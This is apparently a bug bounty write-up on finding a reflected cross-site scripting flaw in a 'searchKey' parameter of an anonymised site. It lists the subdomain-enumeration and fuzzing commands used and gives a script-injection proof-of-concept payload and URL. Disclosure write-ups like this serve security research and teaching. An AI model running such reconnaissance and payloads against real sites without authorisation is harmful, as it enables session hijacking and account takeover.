Alt Text

Overview

This report details the discovery and exploitation of a XSS vulnerability identified in the Vulnerability Disclosure Program (VDP) of a target website.

Reconnaissance

The reconnaissance phase began with the enumeration of subdomains to identify fresh assets that might be unexplored by previous researchers. Initially, I utilized the tool subfinder with the following command:

subfinder -d target.com -all -silent | tee target.com.subs

Using the -all switch significantly enhanced the enumeration results. To ensure comprehensive coverage, DNS brute-forcing was also executed with shuffleDNS against a wordlist containing approximately 24 million entries:

shuffledns -d target.com -r resolver.txt -w words.txt -mode bruteforce -silent | anew target.com.subs

This approach resulted in approximately 400 unique subdomains. To verify which of these subdomains had active HTTP services, I employed httpx:

cat target.com.subs | httpx -silent -sc -title -fr | tee target.com.http

Ultimately, 23 subdomains were confirmed to have active HTTP services.

In-depth Analysis and Fuzzing

One of these subdomains, commercial.target.com, was selected for deeper investigation. Historical URLs and parameters were identified using waybackurl:

echo commercial.target.com | waybackurl > commercial.target.com.wayback

The resulting data contained numerous URLs and JavaScript files. All unique words from these URLs were extracted with diverman:

python diverman.py -f commercial.target.com.wayback | sort -u > uniquewords.txt

yielding approximately 14,000 unique, target-specific terms. These terms provided an ideal basis for subsequent fuzzing of the web application endpoints.

Fuzzing commenced using ffuf to identify hidden or undocumented paths:

ffuf -w uniquewords.txt -u https://commercial.target.com/FUZZ -c -mc all -fs 14
ffuf -w uniquewords.txt -u https://commercial.target.com/path/FUZZ -c -mc all -fs 14
ffuf -w uniquewords.txt -u https://commercial.target.com/path/path/FUZZ -c -mc all -fs 14

This process led to a specific endpoint:

https://commercial.target.com/path/path/path

Parameter fuzzing was then conducted with the tool x8 to uncover potentially exploitable parameters:

x8 -u https://commercial.target.com/path/path/path -w uniqewords.txt -X GET POST

The fuzzing process identified three reflective parameters: q, s, and searchKey.

Vulnerability Identification and Exploitation

Initial tests with the input value amir123 confirmed reflection in all three parameters:

https://commercial.target.com/path/path/path?q=amir123&s=amir123&searchKey=amir123

Subsequently, input validation was tested using the payload </test> to assess HTML tag handling. The parameters q and s properly encoded HTML tags, whereas the searchKey parameter rendered the payload directly, revealing a reflected XSS vulnerability.

The final proof-of-concept payload executed successfully:

"><script>alert(origin)</script>

URL:

https://commercial.target.com/path/path/path/?searchKey="><script>alert(origin)</script>

Alt Text

Impact

The discovered vulnerability enabled an attacker to execute arbitrary JavaScript in the victim’s browser, facilitating cookie theft and unauthorized access to user accounts.

Despite the severity rated as “medium” by HackerOne triage, the prompt validation and effective reporting resulted in an invitation to a private bug bounty program within four hours of submission.

Conclusion

This detailed report highlights the importance of thorough reconnaissance, precise fuzzing, and careful testing of web application parameters. Proper validation measures are critical to preventing vulnerabilities such as Cross-Site Scripting.


I hope this report has been useful to you.